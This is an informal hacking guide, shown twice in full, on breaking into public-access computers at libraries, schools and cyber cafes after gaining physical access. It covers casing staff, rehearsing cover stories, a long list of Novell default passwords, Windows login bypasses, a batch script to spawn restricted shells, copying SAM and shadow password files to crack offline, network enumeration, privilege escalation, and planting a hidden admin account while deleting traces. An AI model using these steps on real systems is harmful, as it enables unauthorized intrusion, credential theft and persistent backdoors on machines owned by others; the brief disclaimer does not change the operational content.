Main:advertisement
A small guide about physical intrusion and its various aspects
+{_OPENING_}+
After some expieramentation, I decided to write a guide to physical access. this will not cover how to get that access, that is an exercise that will be left up to the reader. This is a guide that will cover steps to take after physical access has been achived, and will cover such topics as getting into the system, gainig command prompt, and (maybe) getting an elevated privilage level. [DISCLAMER] This paper was not posted with malicious intent. Instead it was posted to further knowledge of physical intrusion and how to conduct test of it on your own networks. If you do choose to use this knowledge to gain unauthorized access to a network, your on your own. Neither I, the authour (n3w7yp3), nor the site that this is posted on will be responsible for your actions in any way shape or form. If you fuck up, you're on your own! [/DISCLAIMER]
+{_PHASE 1_}+
The first phase of physical intrusion (as with any hacking) is a good amount of recon. The more you know about the system(s), the better chance that you have of getting in. when you finda place that has public access terminals (local library, cyber cafe, your school, etc), there are several obersvations that you shouldmake. First, what OS do they run? do they use that OSs standard login screen or something differnt (eg: Novell)? what is the version number(s)? these are things to noyce about the software. As for physical things, do the computers have any disc drives? If so are they CD, floppy, ZIP, DVD a combination or any other types? Be sure to see of it has a floppy drive, as this can be used to easily preform some otherwise difficult top complete steps later. Take alook at the staff who are supposed to keep an eye on the users. This could be a librarian, teacher, cyber cafe staff member, etc. Are they attentive? do they walk around? do they glace over users shoulders? Also, try to become a regular at the target. Don't just come in twice (once to gather recon and the next to exploit), instead come a few days a week for about a month. That way the staff will get used to seeing you there. Take note of any other details that seem interesting. Try to learn as much as you can. But be sure to hide your knowledge. That could give you away. Now that you have gathered some knowledge about the target (and if you have not stop reading and do that recon!), it is time to assemble the list of what we will bring along. Here is a list of items that i find are useful:
1. a small mirror like the type found in a womans cosmetic set (for seeing behid you and to the sides)
2. a floppy disc (this can ontain several things. the most common is a linux boot disk)
3. pen and paper (to write down useful info)
well that was a short list. but that is really all thgat you need. Now lets get to the next phase, Compromise.
+{_PHASE 2_}+
This is the compromise phase. in this phase you will go and gain access to the network. the stages that we will cover are:
1. Gain access to the system
2. Gain access to the network (if not already connected)
3. Gain a command prompt
4. Gain an elevated privialge level
Remember, when you go in there it *will* be tense. Speed is of the essence. But you have to try to look relaxed (if you don't it will draw attention to yourself). Try to dress like the other people at this palce. That way you blend in (no, you can't wear your 2600 t-shirt...). Basic social engeneering (SE) skills may come into play. Be ready. Make sure that you ahev an excues as to why you are doing what you are doing. This will help to waylay suspicions if you are caught. And be sure to reherse this excuse so you can say it with out tripping over your words.
Now when you first walk in, you will be presented with a choice of computers. Try to pick one away from most people preferably with a screen that is hard to see if some one is shoulder surfing. From your recon you should know various details about the system, including how you login to it. Most likely you have a username nad password to the system. If not, we have several thing you can try. The first is deafult passwords. Most systems contain a few of these. Here are some of the deafult passwds for Novell (courtesy of www.cirt.net):
1. Novell
Product Groupwise 5.5 Enhancement Pack
Version N/A
Method Multi
User ID servlet
Password manager
Level N/A
Notes
2. Novell
Product Groupwise 6.0
Version N/A
Method Multi
User ID servlet
Password manager
Level N/A
Notes
3. Novell
Product iManager
Version 2.0.1
Method
User ID admin
Password novell
Level Administrator
Notes
4. Novell
Product NDS iMonitor
Version
Method HTTP
User ID sadmin
Password (none)
Level Administrator
Notes
5. Novell
Product Netware
Version N/A
Method Multi
User ID ADMIN
Password (none)
Level N/A
Notes
6. Novell
Product Netware
Version N/A
Method Multi
User ID ADMIN
Password ADMIN
Level N/A
Notes
7. Novell
Product Netware
Version N/A
Method Multi
User ID ARCHIVIST
Password (none)
Level N/A
Notes
8. Novell
Product Netware
Version N/A
Method Multi
User ID ARCHIVIST
Password ARCHIVIST
Level N/A
Notes
9. Novell
Product Netware
Version N/A
Method Multi
User ID BACKUP
Password (none)
Level N/A
Notes
10. Novell
Product Netware
Version N/A
Method Multi
User ID BACKUP
Password BACKUP
Level N/A
Notes
11. Novell
Product Netware
Version N/A
Method Multi
User ID CHEY_ARCHSVR
Password (none)
Level N/A
Notes
12. Novell
Product Netware
Version N/A
Method Multi
User ID CHEY_ARCHSVR
Password CHEY_ARCHSVR
Level N/A
Notes
13. Novell
Product Netware
Version N/A
Method Multi
User ID FAX
Password (none)
Level N/A
Notes
14. Novell
Product Netware
Version N/A
Method Multi
User ID FAX
Password FAX
Level N/A
Notes
15. Novell
Product Netware
Version N/A
Method Multi
User ID FAXUSER
Password (none)
Level N/A
Notes
16. Novell
Product Netware
Version N/A
Method Multi
User ID FAXUSER
Password FAXUSER
Level N/A
Notes
17. Novell
Product Netware
Version N/A
Method Multi
User ID FAXWORKS
Password (none)
Level N/A
Notes
18. Novell
Product Netware
Version N/A
Method Multi
User ID FAXWORKS
Password FAXWORKS
Level N/A
Notes
19. Novell
Product Netware
Version N/A
Method Multi
User ID GATEWAY
Password (none)
Level N/A
Notes
20. Novell
Product Netware
Version N/A
Method Multi
User ID GATEWAY
Password GATEWAY
Level N/A
Notes
21. Novell
Product Netware
Version N/A
Method Multi
User ID GUEST
Password (none)
Level N/A
Notes
22. Novell
Product Netware
Version N/A
Method Multi
User ID GUEST
Password GUEST
Level N/A
Notes
23. Novell
Product Netware
Version N/A
Method Multi
User ID GUEST
Password GUESTGUE
Level N/A
Notes
24. Novell
Product Netware
Version N/A
Method Multi
User ID GUEST
Password GUESTGUEST
Level N/A
Notes
25. Novell
Product Netware
Version N/A
Method Multi
User ID GUEST
Password TSEUG
Level N/A
Notes
26. Novell
Product Netware
Version N/A
Method Multi
User ID HPLASER
Password (none)
Level N/A
Notes
27. Novell
Product Netware
Version N/A
Method Multi
User ID HPLASER
Password HPLASER
Level N/A
Notes
28. Novell
Product Netware
Version N/A
Method Multi
User ID LASER
Password (none)
Level N/A
Notes
29. Novell
Product Netware
Version N/A
Method Multi
User ID LASER
Password LASER
Level N/A
Notes
30. Novell
Product Netware
Version N/A
Method Multi
User ID LASERWRITER
Password (none)
Level N/A
Notes
31. Novell
Product Netware
Version N/A
Method Multi
User ID LASERWRITER
Password LASERWRITER
Level N/A
Notes
32. Novell
Product Netware
Version N/A
Method Multi
User ID MAIL
Password (none)
Level N/A
Notes
33. Novell
Product Netware
Version N/A
Method Multi
User ID MAIL
Password MAIL
Level N/A
Notes
34. Novell
Product Netware
Version N/A
Method Multi
User ID POST
Password (none)
Level N/A
Notes
35. Novell
Product Netware
Version N/A
Method Multi
User ID POST
Password POST
Level N/A
Notes
36. Novell
Product Netware
Version N/A
Method Multi
User ID PRINT
Password (none)
Level N/A
Notes
37. Novell
Product Netware
Version N/A
Method Multi
User ID PRINT
Password PRINT
Level N/A
Notes
38. Novell
Product Netware
Version N/A
Method Multi
User ID PRINTER
Password (none)
Level N/A
Notes
39. Novell
Product Netware
Version N/A
Method Multi
User ID PRINTER
Password PRINTER
Level N/A
Notes
40. Novell
Product Netware
Version N/A
Method Multi
User ID ROOT
Password (none)
Level N/A
Notes
41. Novell
Product Netware
Version N/A
Method Multi
User ID ROOT
Password ROOT
Level N/A
Notes
42. Novell
Product Netware
Version N/A
Method Multi
User ID ROUTER
Password (none)
Level N/A
Notes
43. Novell
Product Netware
Version N/A
Method Multi
User ID SABRE
Password (none)
Level N/A
Notes
44. Novell
Product Netware
Version N/A
Method Multi
User ID SUPERVISOR
Password (none)
Level N/A
Notes
45. Novell
Product Netware
Version N/A
Method Multi
User ID SUPERVISOR
Password HARRIS
Level N/A
Notes
46. Novell
Product Netware
Version N/A
Method Multi
User ID SUPERVISOR
Password NETFRAME
Level N/A
Notes
47. Novell
Product Netware
Version N/A
Method Multi
User ID SUPERVISOR
Password NF
Level N/A
Notes
48. Novell
Product Netware
Version N/A
Method Multi
User ID SUPERVISOR
Password NFI
Level N/A
Notes
49. Novell
Product Netware
Version N/A
Method Multi
User ID SUPERVISOR
Password SUPERVISOR
Level N/A
Notes
50. Novell
Product Netware
Version N/A
Method Multi
User ID SUPERVISOR
Password SYSTEM
Level N/A
Notes
51. Novell
Product Netware
Version N/A
Method Multi
User ID TEST
Password (none)
Level N/A
Notes
52. Novell
Product Netware
Version N/A
Method Multi
User ID TEST
Password TEST
Level N/A
Notes
53. Novell
Product Netware
Version N/A
Method Multi
User ID USER_TEMPLATE
Password (none)
Level N/A
Notes
54. Novell
Product Netware
Version N/A
Method Multi
User ID USER_TEMPLATE
Password USER_TEMPLATE
Level N/A
Notes
55. Novell
Product Netware
Version N/A
Method Multi
User ID WANGTEK
Password (none)
Level N/A
Notes
56. Novell
Product Netware
Version N/A
Method Multi
User ID WANGTEK
Password WANGTEK
Level N/A
Notes
57. Novell
Product Netware
Version N/A
Method Multi
User ID WINDOWS_PASSTHRU
Password (none)
Level N/A
Notes
58. Novell
Product Netware
Version N/A
Method Multi
User ID WINDOWS_PASSTHRU
Password WINDOWS_PASSTHRU
Level N/A
Notes
59. Novell
Product Netware
Version N/A
Method Multi
User ID WINSABRE
Password SABRE
Level N/A
Notes
60. Novell
Product Netware
Version N/A
Method Multi
User ID WINSABRE
Password WINSABRE
Level N/A
Notes
Now, the system might not have Novell installed or none of those work. Well, if it is Windows 9x, simply poweroff the system (a hard poweroff will be just fine), unplug the ethernet cable fom the back and reboot. then at the login screen click `cancle'. Sometimes that will let you on. at this point create a new account and poweroff the system. replace the ethernet cable and boot it back up. then login in with the username/pass that you have just entered (you might have to select the `Local workstation only' option). If the system is Windows XP, try selecting the `Local Workstatrion only' option and entering the username as `Administrator' with no password. I have found that that works at my school. If none of these work (or none are viable), poweroff the machine. Now rebbot it and try to boot to get the boot menu (press the F8 ket during the boot process). If it comes up, select option 7 for the command line. Then entern the following commands (for Windows 9x):
C:\>cd windows
C:\WINDOWS> ren *.pwl *.txt
then exit the command line and reboot. now when the login screen comes up you can enter anything as the username nad password (you might have to check the `local workstation only' box). if that fails, try to boot into safe mode (press and hold F5 during startup). If this succedes, it may give you Admin privilages. If it does, then the admin who oversees this network has "As much intelligence as 2 tin cans and a rubber band". At this point add a username, rebbot and login (again dont forget the `Local Workstation only' box). Alright, if all that has failed, insert your startup disk. You should have a Linux boot disk as well as one that matches the OS that we are trying to gain access to. Insert the one that matches the OS that we're hacking and reboot. now at the command prompt try the following:
C:\>cd windows
C:\WINDOWS>win
Hopefully, that will boot us into windows. However chances are that that will not work. If that is the case, power off the box and insert the Linux boot disk. At this point are goal is to copy the password file to the disk and crack it at home. here are some common locations of password files:
Windows
*SAM file:
C:\WINDOWS\system32\config\sam
C:\WINDOWS\system32\config\sam.txt
HKEY_LOCAL_MACHINE\SAM
C:\WINDOWS\system32repair\sam
UNIX (and its varients. Linux, FreeBSD, etc)
*password file(s):
/etc/passwd
/etc/shadow
/.secure/etc/passwd
/etc/smbpasswd
/etc/nis/passwd
/etc/master.passwd
/etc/security/passwd
/etc/shadow-
/etc/shadow.lock (binary file)
VNC
*Windows:
HKEY_USURS\.DEAFULT\SOFTWARE\ORL\WinVNC3\Password
*UNIX:
$HOME/.vnc/paswd
if you can't find the passwd file, go on google and run a search for the OS and it password file location. If you do get the password file, go home and crack it. then come back and login.
Okay, by this time we should have local access (one way or another). Also, set up the cosmetic mirror so that you can see behind you. and keep an eye on it. it is your early warning system in case some one comes up behind you. Now, your next goal is to get command prompt access. First lets try the eaisest things:
In Windows:
1. Click start run and type cmd (works for all but Win 9x)
2. Click start my programs, accessories and then cmd (again, all but win 9x)
3. Clcik start, programs and then MS_DOS prompt (works for Win 9x)
In *nix:
1. Right click on the desktop and select new terminal
2. Click on the main menu, system tools and then terminal
Now if any of those work, then congrats, you have a shell. If not (which is more likley) then we have a few more things to try.
In Windows:
1. Open up IE and type C:\ if it lets you in navigate to the location of the command line and clcik on the icon. you're in
2. Open Notepad. type in the following code (save it as 8.cmd if you're on Win2K/XP. save it as *bat otherwise):
2a. Now run it. I have never failed to get command line access using this script.
3. If that fails try the following: open up Notepad. now type in the following HTML code and save it as a *.html:
[HTML]
[HEAD]
[TITLE]HD Access[/TITLE]
[/HEAD]
[BODY]
[P][A HREF="file:///C:"]Click here for C: drive access[/A][/P]
[/BODY]
[/HTML]
NOTE: be sure to remove the [ ] and replace them with the normal HTML tags.
3a. now open that *.html and click the link. everywhere that i have tried this, it has given me access.
4. Bring command.com on a floppy disk and execute it.
Anywhoo, you should have a command line one way or another. Now it is time to gather some info about the network. Here are some commands that can help us do this:
net view
net view /domain
net view /domain:domainame
ipconfig
ipconfig /all
ipconfig /displaydns
route print
arp -a
nbtstat -a [computer]
nbtstat -A [computer]
net use
netstat -an
nslookup (set the query type to any [all] and query the networks name server)
hostname
tracert [host]
alright from that little list we have gathered a good deal of info about the host/network. we know thier hostname naming schecme (from the `hostname' command) and now we can guess other hostnames and use `nbtstat' to query them to find out info. we know domain names from `net view /domain' and the computers in those domains from `net view /domain:domainame'. We learned what hosts on the intranet we are connected to from the `netstat -an' command. `tracert' if pointed towards an outside host (eg: www.google.com) will give us an idea of thier network structure, and maybe give us the IP of the gateway and/or router aloing with other hosts. well, now that we have some oinfo lets move on to the next phase: escalate
+{_PHASE 3_}+
Now it is time for us to get an elevated privilage level. First lets try the `at' command if it works then "YAY!!!". make it spawn a shell in a minuet (btw: oit will be the highest level, SYSTEM, whwich is even higher than admin). If not which is more likley, try to copy the passwd files to a disk (see the above section on boot disks), cracking it and then logging back in as an admin level acct. If all else fails, try to download and execute a local exploit on the system (yes, i know its lame). Okay, hopefully we got a elevated privilage level by some means....
+{_PHASE 4_}+
Now it is time for the final phase, hiding our tracks. The first thing to do is to delete all the file that we made earlier. then add an extra admin/SYSTEM/root/super user account. Give it a good strong password. then log off and walk away, knowing that you have access. BTW; don't forget the things you brought along!
+{_CLOSING_}+
Well, i hope that somebody out there learns something from this. Remember, don't be a black-hat/cracker and use the knowledge that you aquire for damaging systems. Always follow the Hacker Ethic. Well, thats all from me.
peace,
--n3w7yp3
-=EOF=-
After some expieramentation, I decided to write a guide to physical access. this will not cover how to get that access, that is an exercise that will be left up to the reader. This is a guide that will cover steps to take after physical access has been achived, and will cover such topics as getting into the system, gainig command prompt, and (maybe) getting an elevated privilage level. [DISCLAMER] This paper was not posted with malicious intent. Instead it was posted to further knowledge of physical intrusion and how to conduct test of it on your own networks. If you do choose to use this knowledge to gain unauthorized access to a network, your on your own. Neither I, the authour (n3w7yp3), nor the site that this is posted on will be responsible for your actions in any way shape or form. If you fuck up, you're on your own! [/DISCLAIMER]
+{_PHASE 1_}+
The first phase of physical intrusion (as with any hacking) is a good amount of recon. The more you know about the system(s), the better chance that you have of getting in. when you finda place that has public access terminals (local library, cyber cafe, your school, etc), there are several obersvations that you shouldmake. First, what OS do they run? do they use that OSs standard login screen or something differnt (eg: Novell)? what is the version number(s)? these are things to noyce about the software. As for physical things, do the computers have any disc drives? If so are they CD, floppy, ZIP, DVD a combination or any other types? Be sure to see of it has a floppy drive, as this can be used to easily preform some otherwise difficult top complete steps later. Take alook at the staff who are supposed to keep an eye on the users. This could be a librarian, teacher, cyber cafe staff member, etc. Are they attentive? do they walk around? do they glace over users shoulders? Also, try to become a regular at the target. Don't just come in twice (once to gather recon and the next to exploit), instead come a few days a week for about a month. That way the staff will get used to seeing you there. Take note of any other details that seem interesting. Try to learn as much as you can. But be sure to hide your knowledge. That could give you away. Now that you have gathered some knowledge about the target (and if you have not stop reading and do that recon!), it is time to assemble the list of what we will bring along. Here is a list of items that i find are useful:
1. a small mirror like the type found in a womans cosmetic set (for seeing behid you and to the sides)
2. a floppy disc (this can ontain several things. the most common is a linux boot disk)
3. pen and paper (to write down useful info)
well that was a short list. but that is really all thgat you need. Now lets get to the next phase, Compromise.
+{_PHASE 2_}+
This is the compromise phase. in this phase you will go and gain access to the network. the stages that we will cover are:
1. Gain access to the system
2. Gain access to the network (if not already connected)
3. Gain a command prompt
4. Gain an elevated privialge level
Remember, when you go in there it *will* be tense. Speed is of the essence. But you have to try to look relaxed (if you don't it will draw attention to yourself). Try to dress like the other people at this palce. That way you blend in (no, you can't wear your 2600 t-shirt...). Basic social engeneering (SE) skills may come into play. Be ready. Make sure that you ahev an excues as to why you are doing what you are doing. This will help to waylay suspicions if you are caught. And be sure to reherse this excuse so you can say it with out tripping over your words.
Now when you first walk in, you will be presented with a choice of computers. Try to pick one away from most people preferably with a screen that is hard to see if some one is shoulder surfing. From your recon you should know various details about the system, including how you login to it. Most likely you have a username nad password to the system. If not, we have several thing you can try. The first is deafult passwords. Most systems contain a few of these. Here are some of the deafult passwds for Novell (courtesy of www.cirt.net):
1. Novell
Product Groupwise 5.5 Enhancement Pack
Version N/A
Method Multi
User ID servlet
Password manager
Level N/A
Notes
2. Novell
Product Groupwise 6.0
Version N/A
Method Multi
User ID servlet
Password manager
Level N/A
Notes
3. Novell
Product iManager
Version 2.0.1
Method
User ID admin
Password novell
Level Administrator
Notes
4. Novell
Product NDS iMonitor
Version
Method HTTP
User ID sadmin
Password (none)
Level Administrator
Notes
5. Novell
Product Netware
Version N/A
Method Multi
User ID ADMIN
Password (none)
Level N/A
Notes
6. Novell
Product Netware
Version N/A
Method Multi
User ID ADMIN
Password ADMIN
Level N/A
Notes
7. Novell
Product Netware
Version N/A
Method Multi
User ID ARCHIVIST
Password (none)
Level N/A
Notes
8. Novell
Product Netware
Version N/A
Method Multi
User ID ARCHIVIST
Password ARCHIVIST
Level N/A
Notes
9. Novell
Product Netware
Version N/A
Method Multi
User ID BACKUP
Password (none)
Level N/A
Notes
10. Novell
Product Netware
Version N/A
Method Multi
User ID BACKUP
Password BACKUP
Level N/A
Notes
11. Novell
Product Netware
Version N/A
Method Multi
User ID CHEY_ARCHSVR
Password (none)
Level N/A
Notes
12. Novell
Product Netware
Version N/A
Method Multi
User ID CHEY_ARCHSVR
Password CHEY_ARCHSVR
Level N/A
Notes
13. Novell
Product Netware
Version N/A
Method Multi
User ID FAX
Password (none)
Level N/A
Notes
14. Novell
Product Netware
Version N/A
Method Multi
User ID FAX
Password FAX
Level N/A
Notes
15. Novell
Product Netware
Version N/A
Method Multi
User ID FAXUSER
Password (none)
Level N/A
Notes
16. Novell
Product Netware
Version N/A
Method Multi
User ID FAXUSER
Password FAXUSER
Level N/A
Notes
17. Novell
Product Netware
Version N/A
Method Multi
User ID FAXWORKS
Password (none)
Level N/A
Notes
18. Novell
Product Netware
Version N/A
Method Multi
User ID FAXWORKS
Password FAXWORKS
Level N/A
Notes
19. Novell
Product Netware
Version N/A
Method Multi
User ID GATEWAY
Password (none)
Level N/A
Notes
20. Novell
Product Netware
Version N/A
Method Multi
User ID GATEWAY
Password GATEWAY
Level N/A
Notes
21. Novell
Product Netware
Version N/A
Method Multi
User ID GUEST
Password (none)
Level N/A
Notes
22. Novell
Product Netware
Version N/A
Method Multi
User ID GUEST
Password GUEST
Level N/A
Notes
23. Novell
Product Netware
Version N/A
Method Multi
User ID GUEST
Password GUESTGUE
Level N/A
Notes
24. Novell
Product Netware
Version N/A
Method Multi
User ID GUEST
Password GUESTGUEST
Level N/A
Notes
25. Novell
Product Netware
Version N/A
Method Multi
User ID GUEST
Password TSEUG
Level N/A
Notes
26. Novell
Product Netware
Version N/A
Method Multi
User ID HPLASER
Password (none)
Level N/A
Notes
27. Novell
Product Netware
Version N/A
Method Multi
User ID HPLASER
Password HPLASER
Level N/A
Notes
28. Novell
Product Netware
Version N/A
Method Multi
User ID LASER
Password (none)
Level N/A
Notes
29. Novell
Product Netware
Version N/A
Method Multi
User ID LASER
Password LASER
Level N/A
Notes
30. Novell
Product Netware
Version N/A
Method Multi
User ID LASERWRITER
Password (none)
Level N/A
Notes
31. Novell
Product Netware
Version N/A
Method Multi
User ID LASERWRITER
Password LASERWRITER
Level N/A
Notes
32. Novell
Product Netware
Version N/A
Method Multi
User ID MAIL
Password (none)
Level N/A
Notes
33. Novell
Product Netware
Version N/A
Method Multi
User ID MAIL
Password MAIL
Level N/A
Notes
34. Novell
Product Netware
Version N/A
Method Multi
User ID POST
Password (none)
Level N/A
Notes
35. Novell
Product Netware
Version N/A
Method Multi
User ID POST
Password POST
Level N/A
Notes
36. Novell
Product Netware
Version N/A
Method Multi
User ID PRINT
Password (none)
Level N/A
Notes
37. Novell
Product Netware
Version N/A
Method Multi
User ID PRINT
Password PRINT
Level N/A
Notes
38. Novell
Product Netware
Version N/A
Method Multi
User ID PRINTER
Password (none)
Level N/A
Notes
39. Novell
Product Netware
Version N/A
Method Multi
User ID PRINTER
Password PRINTER
Level N/A
Notes
40. Novell
Product Netware
Version N/A
Method Multi
User ID ROOT
Password (none)
Level N/A
Notes
41. Novell
Product Netware
Version N/A
Method Multi
User ID ROOT
Password ROOT
Level N/A
Notes
42. Novell
Product Netware
Version N/A
Method Multi
User ID ROUTER
Password (none)
Level N/A
Notes
43. Novell
Product Netware
Version N/A
Method Multi
User ID SABRE
Password (none)
Level N/A
Notes
44. Novell
Product Netware
Version N/A
Method Multi
User ID SUPERVISOR
Password (none)
Level N/A
Notes
45. Novell
Product Netware
Version N/A
Method Multi
User ID SUPERVISOR
Password HARRIS
Level N/A
Notes
46. Novell
Product Netware
Version N/A
Method Multi
User ID SUPERVISOR
Password NETFRAME
Level N/A
Notes
47. Novell
Product Netware
Version N/A
Method Multi
User ID SUPERVISOR
Password NF
Level N/A
Notes
48. Novell
Product Netware
Version N/A
Method Multi
User ID SUPERVISOR
Password NFI
Level N/A
Notes
49. Novell
Product Netware
Version N/A
Method Multi
User ID SUPERVISOR
Password SUPERVISOR
Level N/A
Notes
50. Novell
Product Netware
Version N/A
Method Multi
User ID SUPERVISOR
Password SYSTEM
Level N/A
Notes
51. Novell
Product Netware
Version N/A
Method Multi
User ID TEST
Password (none)
Level N/A
Notes
52. Novell
Product Netware
Version N/A
Method Multi
User ID TEST
Password TEST
Level N/A
Notes
53. Novell
Product Netware
Version N/A
Method Multi
User ID USER_TEMPLATE
Password (none)
Level N/A
Notes
54. Novell
Product Netware
Version N/A
Method Multi
User ID USER_TEMPLATE
Password USER_TEMPLATE
Level N/A
Notes
55. Novell
Product Netware
Version N/A
Method Multi
User ID WANGTEK
Password (none)
Level N/A
Notes
56. Novell
Product Netware
Version N/A
Method Multi
User ID WANGTEK
Password WANGTEK
Level N/A
Notes
57. Novell
Product Netware
Version N/A
Method Multi
User ID WINDOWS_PASSTHRU
Password (none)
Level N/A
Notes
58. Novell
Product Netware
Version N/A
Method Multi
User ID WINDOWS_PASSTHRU
Password WINDOWS_PASSTHRU
Level N/A
Notes
59. Novell
Product Netware
Version N/A
Method Multi
User ID WINSABRE
Password SABRE
Level N/A
Notes
60. Novell
Product Netware
Version N/A
Method Multi
User ID WINSABRE
Password WINSABRE
Level N/A
Notes
Now, the system might not have Novell installed or none of those work. Well, if it is Windows 9x, simply poweroff the system (a hard poweroff will be just fine), unplug the ethernet cable fom the back and reboot. then at the login screen click `cancle'. Sometimes that will let you on. at this point create a new account and poweroff the system. replace the ethernet cable and boot it back up. then login in with the username/pass that you have just entered (you might have to select the `Local workstation only' option). If the system is Windows XP, try selecting the `Local Workstatrion only' option and entering the username as `Administrator' with no password. I have found that that works at my school. If none of these work (or none are viable), poweroff the machine. Now rebbot it and try to boot to get the boot menu (press the F8 ket during the boot process). If it comes up, select option 7 for the command line. Then entern the following commands (for Windows 9x):
C:\>cd windows
C:\WINDOWS> ren *.pwl *.txt
then exit the command line and reboot. now when the login screen comes up you can enter anything as the username nad password (you might have to check the `local workstation only' box). if that fails, try to boot into safe mode (press and hold F5 during startup). If this succedes, it may give you Admin privilages. If it does, then the admin who oversees this network has "As much intelligence as 2 tin cans and a rubber band". At this point add a username, rebbot and login (again dont forget the `Local Workstation only' box). Alright, if all that has failed, insert your startup disk. You should have a Linux boot disk as well as one that matches the OS that we are trying to gain access to. Insert the one that matches the OS that we're hacking and reboot. now at the command prompt try the following:
C:\>cd windows
C:\WINDOWS>win
Hopefully, that will boot us into windows. However chances are that that will not work. If that is the case, power off the box and insert the Linux boot disk. At this point are goal is to copy the password file to the disk and crack it at home. here are some common locations of password files:
Windows
*SAM file:
C:\WINDOWS\system32\config\sam
C:\WINDOWS\system32\config\sam.txt
HKEY_LOCAL_MACHINE\SAM
C:\WINDOWS\system32repair\sam
UNIX (and its varients. Linux, FreeBSD, etc)
*password file(s):
/etc/passwd
/etc/shadow
/.secure/etc/passwd
/etc/smbpasswd
/etc/nis/passwd
/etc/master.passwd
/etc/security/passwd
/etc/shadow-
/etc/shadow.lock (binary file)
VNC
*Windows:
HKEY_USURS\.DEAFULT\SOFTWARE\ORL\WinVNC3\Password
*UNIX:
$HOME/.vnc/paswd
if you can't find the passwd file, go on google and run a search for the OS and it password file location. If you do get the password file, go home and crack it. then come back and login.
Okay, by this time we should have local access (one way or another). Also, set up the cosmetic mirror so that you can see behind you. and keep an eye on it. it is your early warning system in case some one comes up behind you. Now, your next goal is to get command prompt access. First lets try the eaisest things:
In Windows:
1. Click start run and type cmd (works for all but Win 9x)
2. Click start my programs, accessories and then cmd (again, all but win 9x)
3. Clcik start, programs and then MS_DOS prompt (works for Win 9x)
In *nix:
1. Right click on the desktop and select new terminal
2. Click on the main menu, system tools and then terminal
Now if any of those work, then congrats, you have a shell. If not (which is more likley) then we have a few more things to try.
In Windows:
1. Open up IE and type C:\ if it lets you in navigate to the location of the command line and clcik on the icon. you're in
2. Open Notepad. type in the following code (save it as 8.cmd if you're on Win2K/XP. save it as *bat otherwise):
@ECHO OFF
CLS
START C:\COMMAND.COM
START C:\WINDOWS\COMMAND.COM
START C:\SYSTEM\COMMAND.COM
START C:\WINDOWS\SYSTEM\COMMAND.COM
START C:\WINNT\CMD.EXE
START C:\WINNT\COMMAND.COM
START C:\WINNT\SYSTEM32\CMD.EXE
START C:\WINNT\SYSTEM32\COMMAND.COM
START C:\WINDOWS\SYSTEM32\CMD.EXE
START C:\WINDOWS\SYSTEM32\COMMAND.COM
START c:\WINDOWS\CMD.EXE
START C:\CMD.EXE
CALL COMMAND.COM
CALL CMD.EXE
2a. Now run it. I have never failed to get command line access using this script.
3. If that fails try the following: open up Notepad. now type in the following HTML code and save it as a *.html:
[HTML]
[HEAD]
[TITLE]HD Access[/TITLE]
[/HEAD]
[BODY]
[P][A HREF="file:///C:"]Click here for C: drive access[/A][/P]
[/BODY]
[/HTML]
NOTE: be sure to remove the [ ] and replace them with the normal HTML tags.
3a. now open that *.html and click the link. everywhere that i have tried this, it has given me access.
4. Bring command.com on a floppy disk and execute it.
Anywhoo, you should have a command line one way or another. Now it is time to gather some info about the network. Here are some commands that can help us do this:
net view
net view /domain
net view /domain:domainame
ipconfig
ipconfig /all
ipconfig /displaydns
route print
arp -a
nbtstat -a [computer]
nbtstat -A [computer]
net use
netstat -an
nslookup (set the query type to any [all] and query the networks name server)
hostname
tracert [host]
alright from that little list we have gathered a good deal of info about the host/network. we know thier hostname naming schecme (from the `hostname' command) and now we can guess other hostnames and use `nbtstat' to query them to find out info. we know domain names from `net view /domain' and the computers in those domains from `net view /domain:domainame'. We learned what hosts on the intranet we are connected to from the `netstat -an' command. `tracert' if pointed towards an outside host (eg: www.google.com) will give us an idea of thier network structure, and maybe give us the IP of the gateway and/or router aloing with other hosts. well, now that we have some oinfo lets move on to the next phase: escalate
+{_PHASE 3_}+
Now it is time for us to get an elevated privilage level. First lets try the `at' command if it works then "YAY!!!". make it spawn a shell in a minuet (btw: oit will be the highest level, SYSTEM, whwich is even higher than admin). If not which is more likley, try to copy the passwd files to a disk (see the above section on boot disks), cracking it and then logging back in as an admin level acct. If all else fails, try to download and execute a local exploit on the system (yes, i know its lame). Okay, hopefully we got a elevated privilage level by some means....
+{_PHASE 4_}+
Now it is time for the final phase, hiding our tracks. The first thing to do is to delete all the file that we made earlier. then add an extra admin/SYSTEM/root/super user account. Give it a good strong password. then log off and walk away, knowing that you have access. BTW; don't forget the things you brought along!
+{_CLOSING_}+
Well, i hope that somebody out there learns something from this. Remember, don't be a black-hat/cracker and use the knowledge that you aquire for damaging systems. Always follow the Hacker Ethic. Well, thats all from me.
peace,
--n3w7yp3
-=EOF=-
Posted by 